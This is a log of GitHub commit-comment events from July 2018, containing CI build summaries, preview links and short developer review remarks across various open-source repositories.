{"id":"7940493616","type":"CommitCommentEvent","actor":{"login":"blueprint-bot"},"repo":{"name":"palantir/blueprint"},"payload":{"comment":{"id":29648752,"position":null,"line":null,"path":null,"commit_id":"0ce82defea2a88cb322776cce65b167ab1a8ee32","created_at":"2018-07-09T22:45:27Z","updated_at":"2018-07-09T22:45:27Z","author_association":"COLLABORATOR","body":"<h3>merge _reset.scss files (#2656)</h3>\n\nPreview: <strong><a href='https://18009-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/docs-app/dist/index.html' target='_blank'>documentation</a> | <a href='https://18009-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/landing-app/dist/index.html' target='_blank'>landing</a> | <a href='https://18009-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/table-dev-app/dist/index.html' target='_blank'>table</a></strong>"}},"created_at":"2018-07-09T22:45:27Z"}
{"id":"7940496258","type":"CommitCommentEvent","actor":{"login":"blueprint-bot"},"repo":{"name":"palantir/blueprint"},"payload":{"comment":{"id":29648757,"position":null,"line":null,"path":null,"commit_id":"50786fc90ba97e55d93b9e99817c03863bacb33c","created_at":"2018-07-09T22:46:16Z","updated_at":"2018-07-09T22:46:16Z","author_association":"COLLABORATOR","body":"<h3>!important toaster flex to override inline overlay styles (#2655)</h3>\n\nPreview: <strong><a href='https://18011-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/docs-app/dist/index.html' target='_blank'>documentation</a> | <a href='https://18011-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/landing-app/dist/index.html' target='_blank'>landing</a> | <a href='https://18011-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/table-dev-app/dist/index.html' target='_blank'>table</a></strong>"}},"created_at":"2018-07-09T22:46:16Z"}
{"id":"7940499774","type":"CommitCommentEvent","actor":{"login":"fritzprix"},"repo":{"name":"fritzprix/yarmi"},"payload":{"comment":{"id":29648759,"position":null,"line":null,"path":null,"commit_id":"6905d8adbe20369532655fa4453c7f7ed8d53215","created_at":"2018-07-09T22:47:23Z","updated_at":"2018-07-09T22:47:23Z","author_association":"OWNER","body":"The major problem was that read method for request has been not read until the request is responded. That means server can't get any message (including session message) before response is returned. So the observable in clientsocketadapter is fixed to work concurrently"}},"created_at":"2018-07-09T22:47:23Z"}
{"id":"7940499984","type":"CommitCommentEvent","actor":{"login":"ctf0"},"repo":{"name":"ctf0/laravel-mix-versionhash"},"payload":{"comment":{"id":29648760,"position":null,"line":null,"path":null,"commit_id":"e8282f5f2c0c47ce012c1423880927be44ec0cef","created_at":"2018-07-09T22:47:27Z","updated_at":"2018-07-09T22:47:27Z","author_association":"OWNER","body":"@olssonm can u plz test this on ur setup and see if all is working as expected ?"}},"created_at":"2018-07-09T22:47:27Z"}
{"id":"7940501069","type":"CommitCommentEvent","actor":{"login":"ripplelabs-jenkins"},"repo":{"name":"scottschurr/rippled"},"payload":{"comment":{"id":29648762,"position":null,"line":null,"path":null,"commit_id":"ef267850d0189cfe32d890ee317925bb8f62c3ca","created_at":"2018-07-09T22:47:47Z","updated_at":"2018-07-09T22:47:47Z","author_association":"COLLABORATOR","body":"\n## Jenkins Build Summary\n\nBuilt from [this commit](https://github.com/scottschurr/rippled/commit/ef267850d0189cfe32d890ee317925bb8f62c3ca)\n\nBuilt at __20180709 - 22:47:47__\n\n### Test Results\n\nBuild Type | Log | Result | Status\n---------- | --- | ------ | ------\nrpm | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/1//artifact/rpm.txt) | 1034 cases, 0 failed, t: n/a | PASS :white_check_mark: \nmsvc.debug | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/1//artifact/msvc.debug.txt) | 1032 cases, 0 failed, t: 564s | PASS :white_check_mark: \ngcc.release.unity <br/>-Dassert=true, <br/>MANUAL_TESTS=true | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/1//artifact/gcc.release.unity_Dassert_true_MANUAL_TESTS_true.txt) | 1101 cases, 0 failed, t: 797s | PASS :white_check_mark: \ndocs | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/1//artifact/docs.txt) | 1 cases, 0 failed, t: 2s | PASS :white_check_mark: \ncoverage | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/1//artifact/coverage.txt) | 1035 cases, 0 failed, t: 690s | PASS :white_check_mark: \nmsvc.debug, <br/>PROJECT_NAME=rippled_classic | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/1//artifact/msvc.debug_PROJECT_NAME_rippled_classic.txt) | 1032 cases, 0 failed, t: 1236s | PASS :white_check_mark: \nclang.debug.unity | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/1//artifact/clang.debug.unity.txt) | 1035 cases, 0 failed, t: 251s | PASS :white_check_mark: \nclang.debug.unity, <br/>PARALLEL_TESTS=false | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/1//artifact/clang.debug.unity_PARALLEL_TESTS_false.txt) | 1035 cases, 0 failed, t: 490s | PASS :white_check_mark: \nmsvc.release | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/1//artifact/msvc.release.txt) | 1031 cases, 0 failed, t: 517s | PASS :white_check_mark: \ngcc.debug.unity | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/1//artifact/gcc.debug.unity.txt) | 1035 cases, 0 failed, t: 247s | PASS :white_check_mark: \nclang.debug.nounity | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/1//artifact/clang.debug.nounity.txt) | 1033 cases, 0 failed, t: 698s | PASS :white_check_mark: \ngcc.debug.nounity | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/1//artifact/gcc.debug.nounity.txt) | 1033 cases, 0 failed, t: 230s | PASS :white_check_mark: \nclang.release.unity <br/>-Dassert=true | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/1//artifact/clang.release.unity_Dassert_true.txt) | 1034 cases, 0 failed, t: 335s | PASS :white_check_mark: \ngcc.release.unity <br/>-Dassert=true | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/1//artifact/gcc.release.unity_Dassert_true.txt) | 1034 cases, 0 failed, t: 354s | PASS :white_check_mark: \ngcc.debug.unity <br/>-Dstatic=true | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/1//artifact/gcc.debug.unity_Dstatic_true.txt) | 1035 cases, 0 failed, t: 246s | PASS :white_check_mark: \n\n"}},"created_at":"2018-07-09T22:47:47Z"}
{"id":"7940512277","type":"CommitCommentEvent","actor":{"login":"BrightSkyz"},"repo":{"name":"BrightSkyz/SkyCore"},"payload":{"comment":{"id":29648785,"position":null,"line":null,"path":null,"commit_id":"797f02e38fb49a2a61aca3717b5cfff8c2058072","created_at":"2018-07-09T22:51:17Z","updated_at":"2018-07-09T22:51:17Z","author_association":"OWNER","body":"#1 Fixed"}},"created_at":"2018-07-09T22:51:17Z"}
{"id":"7940517987","type":"CommitCommentEvent","actor":{"login":"Barblebee"},"repo":{"name":"Barblebee/testrepo"},"payload":{"comment":{"id":29648791,"position":null,"line":null,"path":null,"commit_id":"f84fd8878e93e1919aac357acb9fd4eebb49f37e","created_at":"2018-07-09T22:53:10Z","updated_at":"2018-07-09T22:53:10Z","author_association":"OWNER","body":"Krassomat"}},"created_at":"2018-07-09T22:53:10Z"}
{"id":"7940519978","type":"CommitCommentEvent","actor":{"login":"afei190"},"repo":{"name":"NHERI-SimCenter/uqFEM"},"payload":{"comment":{"id":29648799,"position":7,"line":28,"path":"localApp/parseJson3.py","commit_id":"3ca04a9a518e7d02d70e3298736c92230af55016","created_at":"2018-07-09T22:53:47Z","updated_at":"2018-07-09T22:53:47Z","author_association":"NONE","body":"Hi, should it be perl instead of python? dprepro doesn't seem to work with python. "}},"created_at":"2018-07-09T22:53:47Z"}
{"id":"7940523371","type":"CommitCommentEvent","actor":{"login":"fritzprix"},"repo":{"name":"fritzprix/yarmi"},"payload":{"comment":{"id":29648804,"position":null,"line":null,"path":null,"commit_id":"6905d8adbe20369532655fa4453c7f7ed8d53215","created_at":"2018-07-09T22:54:55Z","updated_at":"2018-07-09T22:54:55Z","author_association":"OWNER","body":"And second one was serialization of session message parameter, I implemented session message to generic class and is able to have generic memeber of parameter, however, it should be deserialized without the information of its member class. So gson left the feild as kv map. Fix is done by making the parameter field as string and serialize / deser them before / after serialize / deser whole message "}},"created_at":"2018-07-09T22:54:55Z"}
{"id":"7940526712","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29648813,"position":null,"line":null,"path":null,"commit_id":"837f6815b8dd386b35b30f6e0cfcdf4b69f0114f","created_at":"2018-07-09T22:55:57Z","updated_at":"2018-07-09T22:55:57Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-survey-u](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-survey-u).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-survey-u-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-09T22:55:57Z"}
{"id":"7940527616","type":"CommitCommentEvent","actor":{"login":"Petersouteneur"},"repo":{"name":"Petersouteneur/hello-world"},"payload":{"comment":{"id":29648817,"position":null,"line":null,"path":null,"commit_id":"b90139d96db0c7821ea5b78bc5e4d2bb51cc2a92","created_at":"2018-07-09T22:56:14Z","updated_at":"2018-07-09T22:56:14Z","author_association":"OWNER","body":"Syntax highlighting</h3>\r\n<p>Here’s an example of how you can use syntax highlighting with <a href=\"https://help.github.com/articles/bas\r\nic-writing-and-formatting-syntax/\">GitHub Flavored Markdown</a>:</p>\r\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>```javascript\r\nfunction fancyAlert(arg) {\r\n  if(arg) {\r\n    $.facebox({div:'#foo'})\r\n  }\r\n}\r\n```\r\n</code></pre></div></div>\r\n<p>You can also simply indent your code by four spaces:</p>\r\n"}},"created_at":"2018-07-09T22:56:14Z"}
{"id":"7940528882","type":"CommitCommentEvent","actor":{"login":"Petersouteneur"},"repo":{"name":"Petersouteneur/hello-world"},"payload":{"comment":{"id":29648827,"position":1,"line":1,"path":"pojolsto","commit_id":"b90139d96db0c7821ea5b78bc5e4d2bb51cc2a92","created_at":"2018-07-09T22:56:38Z","updated_at":"2018-07-09T22:56:38Z","author_association":"OWNER","body":"GitHub.com uses its own version of the Markdown syntax that provides an additional set of useful features, \r\nmany of which make it easier to work with content on GitHub.com.</p>\r\n<p>Note that some features of GitHub Flavored Markdown are only available in the descriptions and comments of \r\nIssues and Pull Requests. These include @mentions as well as references to SHA-1 hashes, Issues, and Pull Requ\r\nests. Task Lists are also available in Gist comments and in Gist Markdown files.</p>\r\n<h3>Syntax highlighting</h3>\r\n<p>Here’s an example of how you can use syntax highlighting with <a href=\"https://help.github.com/articles/bas\r\nic-writing-and-formatting-syntax/\">GitHub Flavored Markdown</a>:</p>\r\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>```javascript"}},"created_at":"2018-07-09T22:56:38Z"}
{"id":"7940534534","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29648850,"position":null,"line":null,"path":null,"commit_id":"e8275ee29b06e2884b68f262e9bb085b7efdc673","created_at":"2018-07-09T22:58:29Z","updated_at":"2018-07-09T22:58:29Z","author_association":"NONE","body":"157485520-FisherPedersenConvectEqRefTempBug (mjwitte) - x86_64-MacOS-10.9-clang: OK (2932 of 2932 tests passed, 8 test warnings)\n\nMessages:\n\n * 8 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e8275ee29b06e2884b68f262e9bb085b7efdc673-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e8275ee29b06e2884b68f262e9bb085b7efdc673-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-09T22:58:29Z"}
{"id":"7940543808","type":"CommitCommentEvent","actor":{"login":"Jameson13B"},"repo":{"name":"Jameson13B/Redux-Todo"},"payload":{"comment":{"id":29648874,"position":null,"line":null,"path":null,"commit_id":"c4a1e159f97a0bc2c9599476f592dc4c6f7dc767","created_at":"2018-07-09T23:01:26Z","updated_at":"2018-07-09T23:01:26Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Todo - Initialize Project (MVP)](https://trello.com/c/E9X5hjgR/2-todo-initialize-project-mvp)"}},"created_at":"2018-07-09T23:01:26Z"}
{"id":"7940549673","type":"CommitCommentEvent","actor":{"login":"jayw11"},"repo":{"name":"jayw11/imagenet_ACE"},"payload":{"comment":{"id":29648881,"position":null,"line":null,"path":null,"commit_id":"2e02032760a87a8fce978f3ac5748ba703226aec","created_at":"2018-07-09T23:03:18Z","updated_at":"2018-07-09T23:03:18Z","author_association":"OWNER","body":"imagenet validation dataset ground truth(2012)"}},"created_at":"2018-07-09T23:03:18Z"}
{"id":"7940557371","type":"CommitCommentEvent","actor":{"login":"localhost61"},"repo":{"name":"TV-Rename/tvrename"},"payload":{"comment":{"id":29648897,"position":null,"line":null,"path":null,"commit_id":"fbaaafa2a7572f6268cedf5bacdb41ad94ba32de","created_at":"2018-07-09T23:05:43Z","updated_at":"2018-07-09T23:05:43Z","author_association":"NONE","body":"The code seems OK for me. But I don't have a working VS 2015 for compiling."}},"created_at":"2018-07-09T23:05:43Z"}
{"id":"7940567328","type":"CommitCommentEvent","actor":{"login":"robzienert"},"repo":{"name":"spinnaker/orca"},"payload":{"comment":{"id":29648929,"position":null,"line":null,"path":null,"commit_id":"3915c705ab0f19ceac1e71c3e441ece5d6efca60","created_at":"2018-07-09T23:09:02Z","updated_at":"2018-07-09T23:09:02Z","author_association":"MEMBER","body":"```\r\n{\r\n  \"dryRun\": false,\r\n  \"executions\": {\r\n    \"01CJ0K6AKGX815H4X8A4MGE8ZT\": {\r\n      \"actions\": [\r\n        {\r\n          \"description\": \"Task is running, and is retryable\",\r\n          \"message\": {\r\n            \"kind\": \"runTask\",\r\n            \"executionType\": \"PIPELINE\",\r\n            \"executionId\": \"01CJ0K6AKGX815H4X8A4MGE8ZT\",\r\n            \"application\": \"spintest\",\r\n            \"stageId\": \"01CJ0K6BDK6PEA636GMMSKJTK1\",\r\n            \"taskId\": \"1\",\r\n            \"taskType\": \"com.netflix.spinnaker.orca.pipeline.RestrictExecutionDuringTimeWindow$SuspendExecutionDuringTimeWindowTask\",\r\n            \"attributes\": [],\r\n            \"ackTimeoutMs\": 600000\r\n          }\r\n        },\r\n        {\r\n          \"description\": \"Could not determine an action to take (stage: 01CJ0K6AKJN8C9570KVF20VD47, type: wait)\"\r\n        }\r\n      ],\r\n      \"canApply\": false\r\n    },\r\n    \"01CJ0MM8FKG4CPQZXXRSA0K5A8\": {\r\n      \"actions\": [\r\n        {\r\n          \"description\": \"Task is running, and is retryable\",\r\n          \"message\": {\r\n            \"kind\": \"runTask\",\r\n            \"executionType\": \"PIPELINE\",\r\n            \"executionId\": \"01CJ0MM8FKG4CPQZXXRSA0K5A8\",\r\n            \"application\": \"spintest\",\r\n            \"stageId\": \"01CJ0MM8FN108H12W6P3EGCXYR\",\r\n            \"taskId\": \"1\",\r\n            \"taskType\": \"com.netflix.spinnaker.orca.pipeline.tasks.WaitTask\",\r\n            \"attributes\": [],\r\n            \"ackTimeoutMs\": 600000\r\n          }\r\n        }\r\n      ],\r\n      \"canApply\": true\r\n    },\r\n    \"01CJ0MMAW5JR2DY00FSCE7S8EJ\": {\r\n      \"actions\": [\r\n        {\r\n          \"description\": \"Task is running, and is retryable\",\r\n          \"message\": {\r\n            \"kind\": \"runTask\",\r\n            \"executionType\": \"PIPELINE\",\r\n            \"executionId\": \"01CJ0MMAW5JR2DY00FSCE7S8EJ\",\r\n            \"application\": \"spintest\",\r\n            \"stageId\": \"01CJ0MMAW6YWA4W8HE2096X352\",\r\n            \"taskId\": \"1\",\r\n            \"taskType\": \"com.netflix.spinnaker.orca.pipeline.tasks.WaitTask\",\r\n            \"attributes\": [],\r\n            \"ackTimeoutMs\": 600000\r\n          }\r\n        }\r\n      ],\r\n      \"canApply\": true\r\n    },\r\n    \"01CJ0MMA4WK9EQR8GDB8H1R65N\": {\r\n      \"actions\": [\r\n        {\r\n          \"description\": \"Task is running, and is retryable\",\r\n          \"message\": {\r\n            \"kind\": \"runTask\",\r\n            \"executionType\": \"PIPELINE\",\r\n            \"executionId\": \"01CJ0MMA4WK9EQR8GDB8H1R65N\",\r\n            \"application\": \"spintest\",\r\n            \"stageId\": \"01CJ0MMA4WMQ6Z837803T3XWYH\",\r\n            \"taskId\": \"1\",\r\n            \"taskType\": \"com.netflix.spinnaker.orca.pipeline.tasks.WaitTask\",\r\n            \"attributes\": [],\r\n            \"ackTimeoutMs\": 600000\r\n          }\r\n        }\r\n      ],\r\n      \"canApply\": true\r\n    },\r\n    \"01CJ0MM9BEFBWZX0F123ADJ6V5\": {\r\n      \"actions\": [\r\n        {\r\n          \"description\": \"Task is running, and is retryable\",\r\n          \"message\": {\r\n            \"kind\": \"runTask\",\r\n            \"executionType\": \"PIPELINE\",\r\n            \"executionId\": \"01CJ0MM9BEFBWZX0F123ADJ6V5\",\r\n            \"application\": \"spintest\",\r\n            \"stageId\": \"01CJ0MM9BEZZK79TZNF17T8BFK\",\r\n            \"taskId\": \"1\",\r\n            \"taskType\": \"com.netflix.spinnaker.orca.pipeline.tasks.WaitTask\",\r\n            \"attributes\": [],\r\n            \"ackTimeoutMs\": 600000\r\n          }\r\n        }\r\n      ],\r\n      \"canApply\": true\r\n    },\r\n    \"01CJ0MMBK5NE816B0DHV8684N2\": {\r\n      \"actions\": [\r\n        {\r\n          \"description\": \"Task is running, and is retryable\",\r\n          \"message\": {\r\n            \"kind\": \"runTask\",\r\n            \"executionType\": \"PIPELINE\",\r\n            \"executionId\": \"01CJ0MMBK5NE816B0DHV8684N2\",\r\n            \"application\": \"spintest\",\r\n            \"stageId\": \"01CJ0MMBK59VS6ZG0MPJCXJPE7\",\r\n            \"taskId\": \"1\",\r\n            \"taskType\": \"com.netflix.spinnaker.orca.pipeline.tasks.WaitTask\",\r\n            \"attributes\": [],\r\n            \"ackTimeoutMs\": 600000\r\n          }\r\n        }\r\n      ],\r\n      \"canApply\": true\r\n    }\r\n  }\r\n}\r\n```"}},"created_at":"2018-07-09T23:09:02Z"}
{"id":"7940574585","type":"CommitCommentEvent","actor":{"login":"Radiateurs"},"repo":{"name":"dsi-icl/optimise-core"},"payload":{"comment":{"id":29648941,"position":null,"line":null,"path":null,"commit_id":"e6428530eb5e1ab245b1c67a63105b85116f7a90","created_at":"2018-07-09T23:11:31Z","updated_at":"2018-07-09T23:11:31Z","author_association":"NONE","body":"Typo : getting*"}},"created_at":"2018-07-09T23:11:31Z"}
{"id":"7940575124","type":"CommitCommentEvent","actor":{"login":"green77777"},"repo":{"name":"nhnent/tui.chart"},"payload":{"comment":{"id":29648946,"position":null,"line":null,"path":null,"commit_id":"fe4615132a20d0f384a769e1e800fab1d615b4c0","created_at":"2018-07-09T23:11:42Z","updated_at":"2018-07-09T23:11:42Z","author_association":"NONE","body":"fe46151"}},"created_at":"2018-07-09T23:11:42Z"}
{"id":"7940579067","type":"CommitCommentEvent","actor":{"login":"lewurm"},"repo":{"name":"mono/mono"},"payload":{"comment":{"id":29648958,"position":17,"line":154,"path":"sdks/ios/appbuilder/appbuilder.cs","commit_id":"7d65522b2806e350d5f127ac99abaa2dc4ed484f","created_at":"2018-07-09T23:13:01Z","updated_at":"2018-07-09T23:13:01Z","author_association":"MEMBER","body":"thx"}},"created_at":"2018-07-09T23:13:01Z"}
{"id":"7940581231","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29648965,"position":null,"line":null,"path":null,"commit_id":"2f9bd4fcdc7ab7be21cb59b8139fa3a06ce0032e","created_at":"2018-07-09T23:13:45Z","updated_at":"2018-07-09T23:13:45Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-dshblks2](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-dshblks2).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-dshblks2-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-09T23:13:45Z"}
{"id":"7940581928","type":"CommitCommentEvent","actor":{"login":"DrkMatr1984"},"repo":{"name":"RealmOfTowny-Devs/TownyWarsROT"},"payload":{"comment":{"id":29648967,"position":null,"line":null,"path":null,"commit_id":"b350c9c5cc8a0b879e3c9545c9022dba2df16cb5","created_at":"2018-07-09T23:13:58Z","updated_at":"2018-07-09T23:13:58Z","author_association":"CONTRIBUTOR","body":"I believe it's http://minevolt.net/repo/\r\nor https://minevolt.net/repo/\r\nCan't remember if it's using https right now or not, but you should be able to fetch dependencies from one of those."}},"created_at":"2018-07-09T23:13:58Z"}
{"id":"7940582259","type":"CommitCommentEvent","actor":{"login":"pablopennisi"},"repo":{"name":"pablopennisi/pruebasJava"},"payload":{"comment":{"id":29648968,"position":null,"line":null,"path":null,"commit_id":"622f411a5c0c1c9f2e025e6a2855cb5658332fea","created_at":"2018-07-09T23:14:05Z","updated_at":"2018-07-09T23:14:05Z","author_association":"OWNER","body":"Primer commit"}},"created_at":"2018-07-09T23:14:05Z"}
{"id":"7940589072","type":"CommitCommentEvent","actor":{"login":"qwelias"},"repo":{"name":"vpulim/node-soap"},"payload":{"comment":{"id":29648992,"position":null,"line":null,"path":null,"commit_id":"d6d22c9209a7b2ebbc85e98b7a1a0a3cddb13ea1","created_at":"2018-07-09T23:16:12Z","updated_at":"2018-07-09T23:16:12Z","author_association":"NONE","body":"@herom good point, I didn't even knew about initial development being specified as `0.x.x` "}},"created_at":"2018-07-09T23:16:12Z"}
{"id":"7940591186","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/Sorsi"},"payload":{"comment":{"id":29648996,"position":13,"line":16,"path":"week-08/day-02/06-click-three-times.js","commit_id":"0c948dc1c9260791cac4fef8cbae6e663d29962b","created_at":"2018-07-09T23:16:55Z","updated_at":"2018-07-09T23:16:55Z","author_association":"NONE","body":";"}},"created_at":"2018-07-09T23:16:55Z"}
{"id":"7940592805","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/Sorsi"},"payload":{"comment":{"id":29649000,"position":12,"line":10,"path":"week-08/day-02/05-delayed-click.js","commit_id":"043c79c9d9f4c5a7664ffeb7ae3639657c262051","created_at":"2018-07-09T23:17:22Z","updated_at":"2018-07-09T23:17:22Z","author_association":"NONE","body":";"}},"created_at":"2018-07-09T23:17:22Z"}
{"id":"7940592912","type":"CommitCommentEvent","actor":{"login":"Nowosad"},"repo":{"name":"Robinlovelace/geocompr"},"payload":{"comment":{"id":29649001,"position":null,"line":null,"path":null,"commit_id":"e3bdbcf839e285f416158d1a87a20aee504f4cd9","created_at":"2018-07-09T23:17:24Z","updated_at":"2018-07-09T23:17:24Z","author_association":"COLLABORATOR","body":"@Robinlovelace - you should have an email from Martijn about that. He plans to submit **tmap** to CRAN in a week or so."}},"created_at":"2018-07-09T23:17:24Z"}
{"id":"7940594959","type":"CommitCommentEvent","actor":{"login":"k0kubun"},"repo":{"name":"ruby/ruby"},"payload":{"comment":{"id":29649005,"position":null,"line":null,"path":null,"commit_id":"6c4e05d2d860b3955ffc537a33e3c325abc7fe00","created_at":"2018-07-09T23:18:04Z","updated_at":"2018-07-09T23:18:04Z","author_association":"MEMBER","body":"deleted on GC or exit in my understanding. Did you see left files?"}},"created_at":"2018-07-09T23:18:04Z"}
{"id":"7940598153","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/Sorsi"},"payload":{"comment":{"id":29649015,"position":8,"line":8,"path":"week-08/day-02/05-delayed-click.html","commit_id":"efda3a74d9b45fed732c20f375c006635ed31b34","created_at":"2018-07-09T23:19:09Z","updated_at":"2018-07-09T23:19:09Z","author_association":"NONE","body":"Pay attention to indentations"}},"created_at":"2018-07-09T23:19:09Z"}
{"id":"7940598732","type":"CommitCommentEvent","actor":{"login":"k0kubun"},"repo":{"name":"ruby/ruby"},"payload":{"comment":{"id":29649016,"position":null,"line":null,"path":null,"commit_id":"6c4e05d2d860b3955ffc537a33e3c325abc7fe00","created_at":"2018-07-09T23:19:19Z","updated_at":"2018-07-09T23:19:19Z","author_association":"MEMBER","body":"ah but not sure when it's renamed.. (especially on windows)"}},"created_at":"2018-07-09T23:19:19Z"}
{"id":"7940601773","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/Sorsi"},"payload":{"comment":{"id":29649026,"position":3,"line":3,"path":"week-08/day-03/01-Login-Form/login.js","commit_id":"408da99f42fc10494ef6632d2bfea7ad93eb4d6d","created_at":"2018-07-09T23:20:20Z","updated_at":"2018-07-09T23:20:20Z","author_association":"NONE","body":"window.onload 😍 "}},"created_at":"2018-07-09T23:20:20Z"}
{"id":"7940604663","type":"CommitCommentEvent","actor":{"login":"jleach"},"repo":{"name":"bcgov/range-api"},"payload":{"comment":{"id":29649032,"position":5,"line":10,"path":"package.json","commit_id":"c2c2b788c3f77493fcabf56e517fb4260443cfa1","created_at":"2018-07-09T23:21:14Z","updated_at":"2018-07-09T23:21:14Z","author_association":"MEMBER","body":"Earlier I renamed the package at the suggestion of @angehlers so its now called:\r\n`@bcgov/common-nodejs` and I reset the tag to v0.0.1. I think this line should read:\r\n```json\r\n\"@bcgov/nodejs-common-utils\": \"git+https://git@github.com/bcgov/nodejs-common-utils.git#v0.0.1\",\r\n```"}},"created_at":"2018-07-09T23:21:14Z"}
{"id":"7940605805","type":"CommitCommentEvent","actor":{"login":"dongming33333"},"repo":{"name":"EOSVR/EOSVR"},"payload":{"comment":{"id":29649035,"position":null,"line":null,"path":null,"commit_id":"b624c8aeb4b8b866d73452c7358c0ddbc99ac34a","created_at":"2018-07-09T23:21:37Z","updated_at":"2018-07-09T23:21:37Z","author_association":"NONE","body":"\n更新迭代很快，点赞\n\n\n\n\n    \n    \n    \n\n\n\n    \n        \n            \n                \n                    \n                        \n                    \n                    \n                        \n                            316253432\n                            \n                            \n                                \n                                    邮箱：316253432@qq.com\n                                \n                        \n                    \n                \n            \n        \n    \n\n\nSignature is customized by Netease Mail Master\nOn 07/10/2018 04:12, wsdfz wrote: 旧版本那个按钮有bug。刚上传的新版已经修复了。目前的demo版更新都要把之前的删了再下载，所以更新前务必备份好私钥（用的帐号、密码模式就不用）。另外，冷钱包不用更新。\n\n—You are receiving this because you commented.Reply to this email directly, view it on GitHub, or mute the thread.\n{\"api_version\":\"1.0\",\"publisher\":{\"api_key\":\"05dde50f1d1a384dd78767c55493e4bb\",\"name\":\"GitHub\"},\"entity\":{\"external_key\":\"github/EOSVR/EOSVR\",\"title\":\"EOSVR/EOSVR\",\"subtitle\":\"GitHub repository\",\"main_image_url\":\"https://assets-cdn.github.com/images/email/message_cards/header.png\",\"avatar_image_url\":\"https://assets-cdn.github.com/images/email/message_cards/avatar.png\",\"action\":{\"name\":\"Open in GitHub\",\"url\":\"https://github.com/EOSVR/EOSVR\"}},\"updates\":{\"snippets\":[{\"icon\":\"PERSON\",\"message\":\"@wsdfz on b624c8a: 旧版本那个按钮有bug。刚上传的新版已经修复了。目前的demo版更新都要把之前的删了再下载，所以更新前务必备份好私钥（用的帐号、密码模式就不用）。另外，冷钱包不用更新。\"}],\"action\":{\"name\":\"View Commit\",\"url\":\"https://github.com/EOSVR/EOSVR/commit/b624c8aeb4b8b866d73452c7358c0ddbc99ac34a#commitcomment-29647070\"}}}\n[\n{\n\"@context\": \"http://schema.org\",\n\"@type\": \"EmailMessage\",\n\"potentialAction\": {\n\"@type\": \"ViewAction\",\n\"target\": \"https://github.com/EOSVR/EOSVR/commit/b624c8aeb4b8b866d73452c7358c0ddbc99ac34a#commitcomment-29647070\",\n\"url\": \"https://github.com/EOSVR/EOSVR/commit/b624c8aeb4b8b866d73452c7358c0ddbc99ac34a#commitcomment-29647070\",\n\"name\": \"View Commit\"\n},\n\"description\": \"View this Commit on GitHub\",\n\"publisher\": {\n\"@type\": \"Organization\",\n\"name\": \"GitHub\",\n\"url\": \"https://github.com\"\n}\n}\n]"}},"created_at":"2018-07-09T23:21:37Z"}
{"id":"7940606659","type":"CommitCommentEvent","actor":{"login":"jleach"},"repo":{"name":"bcgov/range-api"},"payload":{"comment":{"id":29649039,"position":5,"line":25,"path":"server/index.js","commit_id":"c2c2b788c3f77493fcabf56e517fb4260443cfa1","created_at":"2018-07-09T23:21:56Z","updated_at":"2018-07-09T23:21:56Z","author_association":"MEMBER","body":"These should be reset back to `@bcgov/nodejs-common-utils`"}},"created_at":"2018-07-09T23:21:56Z"}
